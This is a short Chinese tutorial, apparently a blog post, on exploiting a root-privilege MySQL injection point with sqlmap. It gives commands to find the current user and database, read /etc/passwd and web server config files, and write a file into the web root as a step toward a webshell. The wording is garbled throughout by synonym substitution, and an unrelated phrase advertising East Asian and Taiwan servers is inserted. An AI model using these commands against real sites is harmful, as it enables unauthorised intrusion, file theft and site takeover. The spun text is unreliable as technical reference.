碰着一mysql root权限注入点,实验用sqlmap进一步渗透获取更高权限,东亚服务器 台湾服务器,详细如下:
判定注入点的当前用户和当前数据库
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db
root权限注入点可以实验读取系统文件,好比/etc/passwd,以及apache,nginx的设置文件等,相关设置文件路径如下:
nginx: usr/local/nginx/conf/nginx.conf
常用的apache设置文件路径有:
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
sqlmap读取文件语法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"
假如magic_quotes_gpc=off就可以实验举办写入Webshell,sqlmap写入文件语法:
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt
将当地的test.txt写入到站点处事器的html目次下。